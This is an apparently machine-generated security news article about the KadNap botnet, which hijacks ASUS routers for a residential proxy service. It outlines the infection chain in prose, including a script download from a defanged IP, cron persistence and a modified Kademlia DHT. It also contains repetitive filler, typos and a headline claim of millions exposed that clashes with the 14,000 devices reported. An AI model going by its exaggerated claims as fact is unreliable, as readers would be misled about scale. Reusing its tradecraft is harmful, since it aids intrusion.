Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

New KadNap Botnet Exploits ASUS Routers to Fuel Cybercrime Proxy Network, Leaving Millions Exposed




The New KadNap botnet is hijacking ASUS routers to fuel a cybercrime proxy network, leaving millions exposed. The decentralized approach used by the malware makes it difficult for defenders to identify and disrupt the C2 infrastructure, highlighting the need for organizations to stay vigilant and take proactive measures to protect themselves against these types of threats.

  • The KadNap botnet is exploiting ASUS routers and other edge networking devices as proxies for malicious traffic.
  • The botnet has grown to 14,000 devices, with nearly half connected to C2 servers dedicated to ASUS-based bots.
  • The KadNap malware uses a modified Kademlia-based DHT protocol to locate botnet nodes and evade traditional network monitoring.
  • The botnet is linked to the Doppelganger proxy service, selling access to infected devices as residential proxies.
  • Organizations must stay vigilant and take proactive measures to protect themselves against these types of threats.



    • New KadNap botnet hijacks ASUS routers to fuel cybercrime proxy network, leaving millions exposed.

    In a shocking turn of events, researchers at Black Lotus Labs have discovered that the newly emerged KadNap botnet is exploiting ASUS routers and other edge networking devices as proxies for malicious traffic. This latest development highlights the ongoing threat landscape in the world of cybersecurity, where hackers are continually finding innovative ways to exploit vulnerabilities and wreak havoc on unsuspecting victims.

    According to the researchers, the KadNap botnet has grown to a staggering 14,000 devices that are part of a peer-to-peer network, with nearly half of these devices connected to Command-and-Control (C2) servers dedicated to ASUS-based bots. This decentralized approach makes it difficult for defenders to identify and disrupt the C2 infrastructure, as each node manages a subset of the complete data.

    The KadNap malware begins with downloading a malicious script (aic.sh) from 212.104.141[.]140, which establishes persistence via a cron job that runs every 55 minutes. The payload is an ELF binary named kad, which installs the KadNap client. Once active, the malware determines the host’s external IP address and contacts multiple Network Time Protocol (NTP) servers to obtain the current time and system uptime.

    Interestingly, KadNap employs a modified Kademlia-based Distributed Hash Table (DHT) protocol to locate botnet nodes and the C2 infrastructure. This custom version of the DHT protocol is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring.

    However, researchers discovered that KanNap’s implementation of Kademlia is undermined by a consistent connection to two specific nodes, which occurs before reaching the C2 servers. This reduces the decentralization that the protocol could achieve in ideal cases and allows identifying the control infrastructure.

    The KadNap botnet has been linked to the Doppelganger proxy service, believed to be a rebrand of the Faceless service, previously associated with TheMoon malware botnet, which also targeted ASUS routers. Doppelganger sells access to infected devices as residential proxies that can be used to funnel malicious traffic, create pseudonymization layers, and evade blocklists.

    As these services are typically used to launch distributed denial-of-service (DDoS), credential stuffing, and brute-force attacks, all leading initially to KadNap victims. Lumen has taken proactive measures against the KadNap botnet, blocking all network traffic to or from the control infrastructure, and releasing a list of indicators of compromise to help others disrupt the botnet on their end.

    The discovery of the KadNap botnet highlights the ongoing threat landscape in the world of cybersecurity. With the increasing use of IoT devices and edge networking, hackers are finding new ways to exploit vulnerabilities and wreak havoc on unsuspecting victims. As such, it is essential for organizations to stay vigilant and take proactive measures to protect themselves against these types of threats.

    In conclusion, the KadNap botnet represents a significant threat to cybersecurity, with its exploitation of ASUS routers and other edge networking devices as proxies for malicious traffic. The decentralized approach used by the KadNap malware makes it difficult for defenders to identify and disrupt the C2 infrastructure, highlighting the need for organizations to stay vigilant and take proactive measures to protect themselves against these types of threats.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/New-KadNap-Botnet-Exploits-ASUS-Routers-to-Fuel-Cybercrime-Proxy-Network-Leaving-Millions-Exposed-ehn.shtml

  • https://www.bleepingcomputer.com/news/security/new-kadnap-botnet-hijacks-asus-routers-to-fuel-cybercrime-proxy-network/

  • https://cyberscoop.com/turla-infiltrates-pakistani-apt-networks-microsoft-lumen/

  • https://securityaffairs.com/168941/apt/salt-typhoon-china-linked-threat-actors-breached-us-isp.html

  • https://thehackernews.com/2026/03/apt41-linked-silver-dragon-targets.html

  • https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/

  • https://securityaffairs.com/172544/apt/lumen-locked-out-salt-typhoon.html

  • https://breach-hq.com/threat-actors


    • Published: Tue Mar 10 10:24:37 2026 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us